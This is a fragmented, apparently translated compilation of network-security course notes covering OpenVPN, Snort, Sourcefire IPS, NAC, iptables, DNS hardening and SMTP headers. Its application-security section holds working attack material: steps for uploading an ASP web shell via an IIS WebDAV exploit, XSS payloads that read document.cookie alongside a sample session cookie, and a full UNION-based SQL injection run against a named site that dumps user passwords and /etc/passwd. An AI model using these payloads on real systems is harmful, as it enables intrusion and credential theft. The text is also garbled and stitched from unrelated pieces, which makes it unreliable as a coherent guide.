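            stats["denied"] += 1
            denied.append((entry["client"], entry["status"], entry["url"]))
    return {"clients": dict(per_client), "denied": denied, "skipped": skipped}


if __name__ == "__main__":
    report = summarise(SAMPLE_ACCESS_LOG)
    for client, stats in sorted(report["clients"].items()):
        print(f"{client}: {stats['requests']} requests, {stats['bytes']} bytes, {stats['denied']} denied")
    for client, status, url in report["denied"]:
        print(f"DENIED {status} {client} {url}")
    print(f"skipped {report['skipped']} malformed line(s)")
```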
Public Key Infrastructure (PKI) is used to solve this problem. It rests on each party owning two keys: a public key known to everyone and a private key that is kept secret. This process is used by OpenSSL, the free open-source implementation of SSL integrated into OpenVPN, to authenticate the VPN peers before data encryption begins.
Let's look at the advantages of the two modes:
OpenVPN mode            Pre-shared keys   SSL
Cipher mode             Symmetric         Asymmetric
Implementation          Easy              Difficult
Speed                   Fast              Slow
CPU usage               Low               High
Key exchange            No                (cell not recovered)
Change of each key      No                (cell not recovered)
cd /etc/openvpn/easy-rsa/
source vars
./clean-all
#./build-ca
./build-key-server server
./build-dh
./pkitool --initca
./pkitool --server server
cd keys
openvpn --genkey --secret ta.key
sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/
/etc/openvpn/ca.crt
/etc/openvpn/easy-rsa/keys/hostname.crt
/etc/openvpn/easy-rsa/keys/hostname.key
/etc/openvpn/ta.key
dev tap0
[the ca file filename.crt must be placed in /etc/openvpn/]
[cert and key likewise]
;up "/etc/openvpn/up.sh br0"
;down "/etc/openvpn/down.sh br0"
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
push "dhcp-option DNS 192.168.78.128"
;push "dhcp-option DOMAIN netpro.edu.vn"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
log-append openvpn.log
verb 2
user and group: configure the user and group under which the OpenVPN daemon runs
Security configuration:
- Set Security Mode to: WPA2 Personal
- Set the encryption algorithm for WPA to: TKIP+AES
- The key devices must use to connect to this wireless network is: vnexperts.net
- My SSID is VNEXPERTS.NET
- Use the built-in Windows tool to search for wireless SSIDs. I see a network with the SSID VNEXPERTS.NET; click Connect and enter the key from above to complete the wireless connection
- But after connecting you will certainly still not be able to reach the Internet
Enter the access key
Connection complete
Assign virtual IP addresses to the VPN connections.
Click Next; the system asks for the conditions that permit the connection. Click Add and then select Windows Group.
Click Add again to add the group you allow to make VPN connections to this server.
Click OK to complete the whole configuration on the Routing and Remote Access server.
c. Creating VPN connections from devices that access via Wi-Fi
- In Step 1 above you connected successfully to a Wi-Fi network. Without the VPN solution, your Access Point is plugged directly into the ADSL modem and the connections can reach the Internet. But that is not secure, because the traffic is encrypted only once, with WPA using AES-TKIP. Here you can also use WEP encryption to support connections that do not support WPA.
- In this solution, after connecting to Wi-Fi you must also connect to the VPN before you can reach the Internet. With the VPN, each packet is encrypted twice: once with WPA and a second time at the IP layer with PPTP or IPsec.
Connecting
- Double-click the connection just created, enter the user vnexperts.net, which is in the VPN group allowed to connect to the VPN server 192.168.50.1, and click Connect
Authentication process
The event will have the following content:
Note: Impact Flag is a feature combining IPS and RNA that allows the risk level of an attack to be assessed. The most dangerous level is Flag 1, followed by 2, 3, 4; the least risky level is Flag 1.
Packet processing and decoding
After decoding, the Sourcefire device runs the preprocessors and compares the result against the rule set.
Events are generated from these processes
Prepare install
The step of preparing the operating system, the libraries and the installer
Install
The step of installing and configuring the services related to snort.
NOTE_1: Start the Fedora Core 10 virtual machine and revert to the Origin snapshot. Log in to Fedora with user: root and password: yeuemnhieu
NOTE_2: Read each line carefully: lines beginning with "#" are illustrations, lines without # are commands.
NOTE_3: Lines in italics are command lines that must be run
NOTE_4: After logging on or rebooting, set the IP address with the commands:
ifconfig eth0 192.168.0.x/24
route add default gw 192.168.0.1
echo "nameserver 208.67.222.222" > /etc/resolv.conf
Installing Snort
Disabling SELinux
SELinux is a service similar to UAC on Windows; to run many commands at once automatically, this Fedora feature must be disabled.
---> Go to System --> Administration --> SELinux Management, disable it, and follow the steps below:
- disable SELinux
- restart the machine
- check that SELinux is off
- set the IP address
Services
To install Snort some services must be stopped and started; for example if IPTABLES is enabled no data can be captured, so it cannot act as an IDS. The services to handle are:
- stop iptables
- start mysqld
- start httpd
The commands to configure these services are:
/etc/init.d/iptables stop
/etc/init.d/mysqld restart
/etc/init.d/httpd restart
Install Snort
Extracting and installing snort
Install Snort with the commands below:
cd /root/Desktop
tar xzvf snort-2.8.5.tar.gz
cd snort-2.8.5
./configure --with-mysql && make && make install
cd /etc/snort
tar xzvf /root/Desktop/snortrules-snapshot-CURRENT.tar.gz
Configuring Snort
Go to the directory /etc/snort/etc and copy all of its files out to /etc/snort
Configure the file /etc/snort/snort.conf:
- Double-click the file to open it in the text editor and edit:
+ Line 194: set the rule path to /etc/snort/rules
+ Lines 259 and 260: add # at the start of the line (the free Snort supports only one detection option)
+ Line 829: remove the # at the start of the line. Set user snort; password snort; database snort; host localhost (this line configures the user snort uses to log in to MySQL).
Installing and configuring the MySQL database (my root user has password=123456)
MySQL configuration commands:
mysql
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost;
SET PASSWORD FOR snort@localhost=PASSWORD('snort');
BASE database settings (form values): Database: snort; Host: Localhost; User: snort; Pass: Snort
Step 5: Create BASE
Step 6: OK
- configure from step 1 -> 5
Run SNORT
To test whether snort runs, download an exploit.rules file from my website with the commands below:
Note: after downloading, go into the directory and rename the file:
rm /etc/snort/rules/exploit.rules -f
cd /etc/snort/rules
wget http://tocbatdat.googlepages.com/exploit.rules
After downloading, the exploit.rules file has had its name changed, so we need to rename it back (and php.ini)
After renaming, run Snort with the command:
snort -v -c /etc/snort/snort.conf -l /etc/snort/log
5. Viewing and testing the results
Use Firefox to visit the address:
http://localhost/base-1.4.4
Try pinging out with packets larger than 800 bytes using the command
ping 192.168.0.1 -s 888
Troubleshooting
If Snort does not run: 1. Re-read the NOTEs. 2. Re-check parts 1-5 of section II, installing SNORT:
No. | Feature | Description
(feature name missing) | Detects attacks from outside such as Worms, Trojans, Buffer overflows, DoS attacks, Backdoor attacks, Spyware, Port scans, VoIP attacks, IPv6 attacks, Statistical anomalies, Protocol anomalies, P2P attacks, Blended threats and Zero-day attacks against service servers. Rules can be set to block attacks, or an automatic tuning mode set according to the services. Produces reports on attacks and security vulnerabilities.
Real-time monitoring and alerting (Real Time Network Awareness, RNA) | RNA helps detect network security risks: network profile (OS, Services, Open Ports, Vulnerabilities, Host statistics). RNA combines with the IPS/IDS to automatically enable/disable the rules needed to protect the network. The Passive Scan feature lets RNA detect network security risks without affecting network capacity.
IT Policy compliance | Issues alerts on security policy violations. These may be: a dangerous attack taking place, or an incident involving a server or a service. Alerts can be sent by Email, SNMP or SYSLOG.
The operating principle and the components of a SourceFire sensor are explained through the following example:
The SourceFire 3D Sensor 3D3500 has 8 Ethernet ports that perform the Sensing function:
Interface Sets:
+ These ports are grouped into different Interface Sets. In the figure, 3 Interface Sets have been created.
+ Interface Sets are created in two modes: Passive and Inline (Inline and Inline with Fail Open).
Detection Engine: performs Monitoring on the Interface Sets (like gatekeepers). In the figure two Detection Engines have been created and perform Monitoring on the Interface Sets. There are 3 kinds of Detection Engine: IPS, RNA and RUA.
Policy: the policy applied to each kind of Detection Engine. An Intrusion Policy applies to an IPS Detection Engine; a Detection Policy applies to RNA.
Step 1: The sensing ports on the Sourcefire 3D Sensor are grouped into Interface Sets. The model above creates Interface Sets in Inline mode.
Step 2: On these Interface Sets, create Detection Engines with a monitoring function.
Step 3: For the Detection Engines to operate, policies must be built and applied to them.
Step 4: When a Detection Engine takes a block-traffic action or detects a security risk, it produces an Event.
d. Setting the management parameters of the Sourcefire devices
Connect the management cables to the devices
On the Sourcefire 3D Sensor devices the management port is port Eth1 at the rear of the device.
On the Sourcefire DC device the management port is port Eth1 at the rear of the device.
The management cables are clearly labelled and must be prepared before installing the devices.
Prepare the cables that plug into the sensing ports as in the deployment model above.
Set the basic parameters of the Sourcefire device
+ Name the device according to the VNPT HN plan.
+ IP address
+ Administrator password
To operate and administer the Sourcefire IPS system, one must know how to check the system information against the design and change the system settings to fit the requirements.
Information
The most general information about the Sourcefire device.
Device name, Model, Version, IP address. Importantly, it shows which Policies are applied to the device.
License
The section for viewing and managing the License of the Sourcefire device.
Network
Lets the administrator view and set the IP, DNS, Proxy and Hostname of the Sourcefire device.
Network Interface
Lets the administrator configure the management port.
Process
The administrator can go to the Process section to issue commands such as Shutdown, Reboot or Restart of the Sourcefire device.
Remote Management
The administrator can manage the Sourcefire devices centrally as specified in the design document: the DC1500 device manages 2 Sensor 3D3500 devices.
Time
Lets you set the time on the device.
In addition there are some other settings such as netflow device, Storage and Health blacklist.
[Diagram: the Mgt_port of each Sourcefire 3D3500 Sensor and the Mgt_port of the Sourcefire DC1500 connected to a Switch]
IPS administration
IPS administration covers setting policies for the Detection Engines, managing Rules, managing SEU updates and some other features.
The administrator can view and change the Detection Engines that are subject to this policy. The figure below shows this Policy applied to one Detection Engine, the DMZ zone of VNPT Hanoi.
The administrator can tune the variables so that the rules work as effectively as possible, by changing or defining new Variables:
For example, if the HTTP service also uses port 443, we add port 443 to HTTP_PORTS.
The complete Sourcefire rule set is over 20,000 Rules, updated regularly by automatically importing SEU from Sourcefire.
For each Intrusion Policy applied to each Detection Engine we can apply a different set of Enabled/Disabled Rules.
Beyond the rules enabled and disabled by default, the administrator must analyze the situation and turn rules on or off to meet the security requirements of the system.
When the RNA feature is used to discover the network (active hosts, OS, Services, IP, MAC, Vulnerabilities), the Sourcefire device can use the result to change the state of Rules, improving the processing performance of the device and reducing unimportant Events.
We can let RNA recommend the state of the Rules.
The Advanced Settings of an Intrusion Policy are an important section that requires the administrator to understand the Sourcefire system deeply before configuring them, to avoid affecting the system. By default this Advanced Settings section is left at its default configuration.
After saving the Intrusion Policy the administrator must Apply the policy to the Detection Engines, and after applying must check whether the process completed successfully.
SEU
This is the interface for monitoring the SEU applied to the Intrusion Policy.
In addition, the administrator can update the SEU on the Sourcefire device by downloading the SEU from the Sourcefire website and importing it into the device.
Rule Editor
By default Sourcefire has over 20,000 Rules, but the administrator can add new Rules to enforce the security policies of their own system. In the Rule Editor interface the administrator can add rules, view and edit the content of a rule with specific settings, and manage Rules.
Email alert
When rules match, the Sourcefire device sends an alert to the administrator.
The administrator can use the Email Alert feature or use a Compliance Policy.
RNA administration
RNA is an advanced Sourcefire feature that discovers the network by Passive Scan, running 24/7.
To administer RNA we need to set up the following:
Detection Policy
The Detection Policy is the policy applied to the RNA Detection Engines. The administrator must create this policy and apply it to the RNA Detection Engines in order to discover the network.
Detection Engine management interface
The administrator can tune an RNA Detection Engine by configuring its Detection Policy.
Below is the management interface and the settings made during the deployment of the Sourcefire device.
Host Attributes
Set for a network zone.
At VNPT Hanoi it is named VNPT Ha Noi and is combined with Network Map, a feature of RNA.
Network Map
Network Map lets the administrator see the network with the following information:
+ Host Active: grouped by network range
+ OS: details of the operating systems
RNA Detector
The administrator can configure the RNA Detector to enable or disable the settings of RNA.
Services running in the network
The administrator can go to RNA Services to discover which Services the system is running and which Services are active on which machine.
[Diagram: Kaspersky Internet Gateway; Endpoint Security for File Server]
[Diagram: Kaspersky Security Center MASTER and Kaspersky Security Center SLAVE]
Control component:
Protection component:
Application management
Data management
Data encryption
content-aware, for deploying enterprise security broadly while taking the important steps of securing data and preventing data loss. Symantec Data Loss Prevention 10 lets enterprises apply content-based encryption and enterprise rights management (ERM), while integrating easily with other Symantec solutions.
Content-based encryption and ERM
The new FlexResponse feature of Symantec Data Loss Prevention 10 helps the enterprise security team apply policy-driven protection to files containing important data, including encryption or ERM. Today, combining DLP with other IT solutions has to be done by hand.
Through partnerships with leading third-party vendors such as GigaTrust, Liquid Machines, Oracle and PGP Corporation, Symantec offers customers a variety of integrated protection options.
For example, a company that currently allows only a few people to access information about a merger can easily apply its DLP policy to classify the data, and at the same time use Microsoft Active Directory Rights Management Services (ADRMS) to apply ERM to the copies of this data, giving a very effective layer of protection.
Making DLP intelligence more usable
New support for XML and Web Services lets Symantec Data Loss Prevention 10 send DLP data to any application or reporting system, including enterprise security dashboards or compliance solutions such as the Symantec Control Compliance Suite.
For example, an e-commerce site could start by using DLP to identify the servers holding data subject to the PCI DSS rules. By sending this information to Symantec Control Compliance Suite, those servers are prioritized for more frequent checks, with tighter controls over the areas storing important data.
New policy import/export features let organizations keep their policies up to date with new regulations, and link and exchange policies with many users to share best practices.
check. 1. Install an Agent that checks whether the computer meets the safety requirements. 2. The NAC gateway applies a Policy that decides which zones the computer may access.
Here I present an article about Cisco NAC; other systems work in a similar way:
Cisco NAC is a simple way of deploying Network Admission Control, used in the network architecture to ensure that security policies are applied to every device accessing network resources. With NAC, administrators can authenticate, authorize and evaluate users on wired or wireless connections and remote-access users. It recognizes devices such as laptops, IP phones or game consoles, applies security policies to them, and prevents potential risks while users access data.
Benefits of Network Admission Control
Virus-infected data in the network is now a problem that needs proper attention; viruses have an ever larger effect on systems. Ensuring that the resources in use are free of viruses is a requirement that must be met, and with its effective anti-virus capability Network Admission Control is one solution.
Cisco NAC helps verify the state of client machines before they access the network. NAC works with an Anti-Virus program to create the conditions and policies that are enforced on clients before they access network resources.
NAC ensures that the clients in the network always have the latest updates for their antivirus software. If a client needs an update, the NAC solution can deliver the update to the client directly. If a client suddenly shows a virus that could affect the whole network, NAC moves the client to a completely isolated network zone until it has been thoroughly checked and found free of viruses and other threats to the network.
How Network Admission Control works.
A NAC deployment is built from several protocols in common use today and from Cisco products, with a few products and features such as:
Cisco Trust Agent (CTA) and plug-ins
Cisco IOS Network Access Device (NAD)
Extensible Authentication Protocol (EAP)
Cisco Secure Access Control Server (ACS)/Remote Authentication Dial-In User Service (RADIUS)
Posture validation/remediation server
The CTA communicates with other software on the client through an Application Program Interface (API) and reports its state in response to requests from the NAD. The CTA is required for communication during a NAC deployment (the CTA talks to NAC using EAP over UDP). A piece of software provides a Posture Plug-In (PP) that forms its interface to the CTA. The PP is an agent implemented in software from other vendors that enforces policies on the state of that software.
In current NAC deployments the NAD is the Layer 3 Cisco IOS software in the devices used to query clients, discovering and controlling the situation using EAP over UDP (EAP over UDP, EOU). This method differs from the NAC solution components shown in the figure below:
Figure: shows how NAC works, with its components working together:
outside the kernel. iptables is responsible for communication between the user and Netfilter, pushing the user's rules into Netfilter for processing. Netfilter filters packets at the IP level. It works directly in the kernel, is fast and does not slow the system down.
It was designed to replace the ipchains of Linux 2.2.x and the ipfwadm of Linux 2.0.x, has more features than ipchains, and is built more sensibly, with the following points:
What can Netfilter/iptables do?
Build firewalls based on stateless and stateful packet filtering.
Use the NAT table and masquerading to share network access when there are not enough network addresses.
Use the NAT table to set up a transparent proxy. Help iproute2-based systems build complex policy routing and QoS. Mangle the TOS/DSCP/ECN bits of the IP header.
Track connections, checking many states of a packet. It does this for UDP and ICMP as well as for TCP connections; for example, a stateful ICMP filter allows an echo reply only when a request was sent out, rather than blocking requests while still accepting replies on the assumption that they always answer a ping. An unsolicited echo reply can be a sign of an attack or of a backdoor. Simple handling of packets traversing the chains (lists of rules) INPUT, OUTPUT and FORWARD. On hosts with several network interfaces, packets moving between interfaces traverse only the FORWARD chain rather than all 3 chains.
Clear separation between packet filtering and NAT (Network Address Translation).
Rate limiting of connections and logging. You can limit connections and logging to avoid denial-of-service attacks. Can filter on TCP flags and on physical addresses. Being a stateful firewall, it can track a connection throughout its life, so it is safer than a firewall with little state. iptables consists of 4 tables, each with a default policy and rules in its built-in chains.
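The stateful ICMP behaviour described above, as an added illustration (not code from the original document): a toy connection tracker that accepts an echo reply only when it has seen the matching outbound request, beside a stateless filter that must accept every reply to keep its own pings working. The addresses and packets are constructed sample data, and the identifier-matching rule is a simplification of what Netfilter's conntrack does.

```python
"""Toy connection tracker for ICMP echo (added example, constructed data)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class IcmpPacket:
    src: str
    dst: str
    kind: str    # "echo-request" or "echo-reply"
    ident: int   # ICMP identifier, shared by a request and its reply


class StatelessFilter:
    """Accepts every echo reply so that the host's own pings keep working."""

    def decide(self, pkt):
        return "ACCEPT"


class StatefulFilter:
    """Remembers outbound requests; a reply is accepted once per request."""

    def __init__(self):
        self._pending = set()   # (requester, target, ident) still awaiting a reply
        self.dropped = []       # unsolicited replies, the ones worth logging

    def decide(self, pkt):
        if pkt.kind == "echo-request":
            self._pending.add((pkt.src, pkt.dst, pkt.ident))
            return "ACCEPT"
        key = (pkt.dst, pkt.src, pkt.ident)   # a reply mirrors its request
        if key in self._pending:
            self._pending.discard(key)        # one reply per request
            return "ACCEPT"
        self.dropped.append(pkt)
        return "DROP"


def run(flt, packets):
    """Apply a filter to a packet list and return the verdicts in order."""
    return [flt.decide(p) for p in packets]


# Constructed sample: one legitimate ping exchange, an unsolicited reply from
# an unknown host (the backdoor/scan case in the text), then a replayed reply.
SAMPLE = [
    IcmpPacket("10.0.0.5", "192.168.0.1", "echo-request", 1),
    IcmpPacket("192.168.0.1", "10.0.0.5", "echo-reply", 1),
    IcmpPacket("203.0.113.9", "10.0.0.5", "echo-reply", 7),
    IcmpPacket("192.168.0.1", "10.0.0.5", "echo-reply", 1),
]

if __name__ == "__main__":
    print("stateless:", run(StatelessFilter(), SAMPLE))
    print("stateful: ", run(StatefulFilter(), SAMPLE))
```

The stateless filter lets the unsolicited and the replayed reply through; the stateful one drops both and keeps them in `dropped`, which is the list a logging rule would write out.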
ipchains
One of the programs Linux uses to configure the kernel's NAT table is ipchains. Inside ipchains there are 2 main scripts used to simplify ipchains administration. ipchains is used to set up, maintain and inspect the IP firewall rules in the Linux kernel. These rules are divided into different chains:
IP Input chain (rules applied to packets arriving at the firewall).
IP Output chain (rules applied to packets generated locally on the firewall and leaving it).
IP forwarding chain (applied to packets forwarded to other hosts or networks through the firewall). And user-defined chains.
ipchains uses the concept of a chain to process packets. A chain is a list of rules for handling packets of the same kind: incoming, forwarded or outgoing. These rules specify which action is applied to the packet. The rules stored in the NAT table are pairs of IP addresses, not individual IP addresses.
A firewall rule specifies packet criteria and a target. If the packet does not match, the next rule is examined; if it matches, the target value is either a user-defined chain or one of the specific values ACCEPT, DENY, REJECT, MASQ, REDIRECT or RETURN.
REDIRECT is used when the Linux kernel was compiled with the parameter CONFIG_IP_TRANSPARENT_PROXY defined. With this, packets are redirected to a local socket even though they were sent to a remote host. Some commonly used syntax:
ipchains -[ADC] chain rule-specification [options]
ipchains -[RI] chain rulenum rule-specification [options]
ipchains -D chain rulenum [options]
ipchains -[LFZNX] [chain] [options]
ipchains -P chain target [options]
ipchains -M [ -L | -S ] [options]
Security theory
Attack skills
Building a network security policy is the step that completes a working environment that operates to a security standard. Today many organizations in our country are building security policies according to the ISO 27001 standard, using the ISMS model.
b. Overview of the policy-building process:
Plan
Define objectives
Identify and quantify information security risks
Identify the compliance requirements
Build the policy
Do
Design the system
Deploy infrastructure protection policies/measures
Securely install the server systems
Securely install the workstations
c. The ISMS system
ISMS system model
Risk assessment
Security policy
Organization of information security
Asset management
Human resources security
Physical and environmental security
Communications and operations management
Access control
Information systems acquisition, development and maintenance
Introduction
Scope
Terms & Definitions
Structure of this Standard
5. Obtaining Management Approval for Initiating the Project to Implement an ISMS
6. Defining ISMS Scope and ISMS Policy
7. Conducting Organization Analysis
8. Conducting Risk Assessment and Risk Treatment Planning
9. Designing the ISMS
IV. APPLICATION SECURITY
A DNS Forwarder is a DNS server that performs DNS queries on behalf of other DNS servers. A DNS Forwarder is used to offload work from the DNS servers that forward their queries to it, and to build up a larger DNS cache on the Forwarder.
to stop the DNS server from forwarding requests while it interacts with DNS servers on the Internet. This function is especially important when the DNS server holds the resources of an internal DNS domain. Instead of letting the internal DNS servers perform recursion themselves and contact other DNS servers, configure the internal DNS servers to use a Forwarder for all domains for which they are not authoritative.
A DNS Advertiser is a DNS server that resolves queries for the domains for which it is authoritative. For example, if you host the resources for domain.com and corp.com, the public DNS server is configured with the DNS zone files for domain.com and corp.com.
The difference between a DNS Advertiser and a DNS server that merely holds zone files is that the DNS Advertiser answers only queries for the domains it is authoritative for. It does not perform recursion for queries that would have to be sent to other servers. This stops users from using the public DNS server to resolve many other domains, and improves security by reducing the risks of running a public DNS Resolver (cache poisoning).
Many DNS servers allow dynamic updates. Dynamic update lets these DNS servers register the hostnames and IP addresses of hosts that receive their addresses from DHCP servers. DDNS can be an effective administrative aid compared with manually configuring the DNS resource records for these hosts.
However, Zone Transfer is not limited to secondary DNS servers. Anyone can run a DNS query against a DNS server configured to allow Zone Transfer and dump the whole zone database. A malicious user can use this information to probe the company's naming scheme and attack key infrastructure services. You can prevent this by configuring the DNS server to refuse Zone Transfer requests, or by configuring it to allow Zone Transfer while refusing the requests of certain servers.
h. Using a firewall to control DNS access
On Windows-based DNS servers, access control should be configured on the Registry settings related to the DNS server, so that only the accounts that need access can read and change those Registry settings.
On Windows-based DNS servers, you should configure access control on the file system objects related to the DNS server, so that only the accounts that need access to them are allowed to read or change these files.
Securing the Web server at the OS layer
Carry out the operating-system hardening steps from the earlier part of this document to obtain a secure operating system.
d. Exploiting a vulnerability in a Web Service
Use ActivePerl + the exploit code file.pl + a shell downloaded from the Internet to exploit the IIS WebDAV vulnerability.
Step 1: Install ActivePerl
Step 2: Copy the file tocbatdat.pl (the attack file)
Step 3: Upload the shell rhtools.asp
Step 4: run this file
Linux# ./rcvalle-rapache IP
At this point the victim's browser unwittingly runs the script that the user posted to the server. Using this script, the hacker can steal the victim's cookie and log in to the system.
Test strings for XSS:
"><script>alert('hey')</script>
http://ha.ckers.org/xss.html All XSS cheat codes
"><script>exec(%systemroot%\system32\cmd.exe)</script>
"><script>while(1){alert('hey')}</script> Infinite loop
"><script>alert(document.cookie)</script>
LeapLastLogin=20090523152133;
PHPSESSID=28026127959bf076767f3adac1c736d5
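The defence against the cookie theft described above, as an added example (not code from the original document): the same reflected page rendered once with the input pasted in verbatim and once through output encoding, plus a Set-Cookie header carrying HttpOnly so that document.cookie never exposes the session id. The template, the cookie flags and the search-page wording are assumptions for the illustration; the payload is one of the test strings listed above.

```python
"""Reflected XSS: unsafe vs escaped rendering (added example)."""
import html

# Assumed page fragment that reflects a user-supplied search term.
TEMPLATE = '<p>Search results for: "{}"</p>'


def render_unsafe(user_input):
    """Reflects the input verbatim: markup in the input is parsed as markup."""
    return TEMPLATE.format(user_input)


def render_safe(user_input):
    """Output encoding: <, >, &, " and ' become entities, so the browser
    displays the text instead of executing it."""
    return TEMPLATE.format(html.escape(user_input, quote=True))


def contains_script_tag(page):
    """Crude check used only to compare the two renderings."""
    return "<script>" in page.lower()


def session_cookie_header(session_id):
    """Cookie name taken from the page; HttpOnly keeps it out of
    document.cookie, Secure keeps it off plain http://."""
    return f"Set-Cookie: PHPSESSID={session_id}; HttpOnly; Secure; SameSite=Lax"


# One of the test strings from the text.
PAYLOAD = '"><script>alert(document.cookie)</script>'

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```

The escaped rendering still shows the attacker's text to the user, which is the correct outcome: the data survives, only its interpretation as HTML is removed.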
Introduction to SQL Injection:
This attack technique exploits flaws in the application (failing to check the characters entered by the user carefully). It works by adding code to the SQL statements or queries (through textboxes) before they are handed to the web application and the Server for processing. The server executes them and returns to the browser (query results or error messages) data from which the hacker can collect information, run commands (in some cases) and eventually take control of the system. Below are some basic tricks.
Example: exploiting a SQL Injection flaw in MySQL and PHP
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1
Checking the website for the flaw
Check how many columns there are: 1 order by 30
Find the vulnerable column: 1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
Having found that column 4 is the vulnerable one, proceed to the next step:
Exploit
Step 1: Show tables
1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables-- &catid=20
Step 2: Show columns
group_concat(unhex(hex(column_name)))
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=char(106, 111, 115, 95, 117, 115, 101, 114, 115)-- &catid=20
Step 3: Get the database
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(username,0x2f,password,0x2f,email,userType),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from jos_users-- &catid=20
Step 4: Read a system file
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,load_file(char(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &catid=20
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1%20and%201=0%20union%20select%201,2,3,4,group_concat%28TenDN,0x2f,MatKhau%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20maxcare_tbadmin-
3. Mail Server service security
a. Overview of SMTP, POP and IMAP
a.1 Email architecture and operation
To send email, the sender must have an account on a mail server. A server can have one or more accounts. Each account has a different name (user). Each
MIME and SMTP
MIME (Multipurpose Internet Mail Extensions) adds capability to SMTP and lets files in multimedia encodings accompany a standard SMTP message. MIME uses the Base64 encoding table to convert complex file formats into ASCII for transfer. MIME is a new standard, but it is already supported by most applications, and you must change if your email program does not support MIME. MIME is specified in the standards RFC 2045-2049.
S/MIME
A new MIME standard that adds support for encrypted messages. S/MIME is based on the RSA public-key technique and keeps a message from being read or intercepted.
SMTP commands
Simply put, SMTP uses short commands to control the message. The table below lists the SMTP commands. The SMTP commands are defined in the standard RFC 821.
HELO
MAIL
RCPT
DATA
RSET
VRFY
NOOP
QUIT
SEND
SMTP Headers
A great deal of useful information can be obtained by examining the header part of a message. Not only where the message came from, its subject, date sent and recipients; you can also see the points the message passed through before reaching your mailbox. The standard RFC 822 specifies what the header contains. At minimum there is the sender (From), the date sent and the recipients (To, CC or BCC).
The header of a received message lets you see where the message passed through before reaching your mailbox. It is a very good tool for checking and troubleshooting. Here is an example:
From someone@mydomain.COM Sat Jul 31 11:33:00 1999
Received: from host1.mydomain.com by host2.mydomain.com (8.8.8+Sun/8.8.8)
    with ESMTP id LAA21968 for ; Sat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.mydomain.com with Internet Mail Service (5.0.1460.8)
    id ; Sat, 31 Jul 1999 11:34:39 -0400
Message-ID:
From: "Your Friend"
To: "'jamisonn@host2.mydomain.com'"
Subject: Hello There
Date: Sat, 31 Jul 1999 11:34:36 -0400
In the example above we can see that the message was sent from someone@mydomain.com. From mydomain.com it was transferred to host1. The message was sent from host2 to host1 and delivered to the user. At each place the message stops, the receiving host is asked to add information to the header, including the date and time of that stop. Host2 reports receiving the message at 11:33:00. Host1 reports receiving the message at 11:34:36; the discrepancy of more than a minute is probably due to the clocks of the two hosts not being synchronized.
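The hop-by-hop reading of Received headers described above, as an added example (not code from the original document): the script parses each Received header with the standard library, lists the hops oldest first, and computes the transit time between consecutive hops, flagging a negative value like the one in the example, which means the later host's clock is behind or the header is not trustworthy. The message below is constructed from the example on this page; the recipient address in the "for" clause and the second message id are placeholders that the page leaves blank.

```python
"""Received-header timeline and clock-skew check (added example)."""
import email
import re
from email.utils import parsedate_to_datetime

# Constructed from the example above; "for" address and second id are placeholders.
RAW_MESSAGE = (
    "Received: from host1.mydomain.com by host2.mydomain.com (8.8.8+Sun/8.8.8)\n"
    "    with ESMTP id LAA21968 for <jamisonn@host2.mydomain.com>;\n"
    "    Sat, 31 Jul 1999 11:33:00 -0400 (EDT)\n"
    "Received: by host1.mydomain.com with Internet Mail Service (5.0.1460.8)\n"
    "    id PLACEHOLDER-ID; Sat, 31 Jul 1999 11:34:39 -0400\n"
    "From: \"Your Friend\" <someone@mydomain.com>\n"
    "To: jamisonn@host2.mydomain.com\n"
    "Subject: Hello There\n"
    "Date: Sat, 31 Jul 1999 11:34:36 -0400\n"
    "\n"
    "Hello\n"
)

BY_RE = re.compile(r"\bby\s+([\w.-]+)")


def hop_times(raw):
    """Return (receiving_host, timestamp) per Received header, oldest hop first."""
    msg = email.message_from_string(raw)
    hops = []
    for hdr in msg.get_all("Received", []):
        if ";" not in hdr:
            continue                        # RFC 822 puts the date after ';'
        match = BY_RE.search(hdr)
        host = match.group(1) if match else "?"
        stamp = parsedate_to_datetime(hdr.rsplit(";", 1)[1].strip())
        hops.append((host, stamp))
    hops.reverse()      # each relay prepends its header, so the top one is the newest
    return hops


def transit_seconds(raw):
    """Seconds between consecutive hops according to the relays' own clocks."""
    hops = hop_times(raw)
    return [int((later[1] - earlier[1]).total_seconds())
            for earlier, later in zip(hops, hops[1:])]


def suspicious_hops(raw):
    """Indexes of hops whose transit time is negative: clock skew or a forged header."""
    return [i for i, secs in enumerate(transit_seconds(raw)) if secs < 0]


if __name__ == "__main__":
    for host, stamp in hop_times(RAW_MESSAGE):
        print(f"{host:22s} {stamp.isoformat()}")
    print("transit seconds:", transit_seconds(RAW_MESSAGE))
    print("suspicious hops:", suspicious_hops(RAW_MESSAGE))
```

For the example message the only transit value is -99 seconds (host2 stamped 11:33:00, host1 stamped 11:34:39), so the first hop is reported as suspicious; in a real investigation the same check is what separates a slow relay from a mis-set clock or a header added by the sender.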
Advantages and disadvantages of SMTP
Like the X.400 protocol, SMTP has some advantages and disadvantages.
The advantages include:
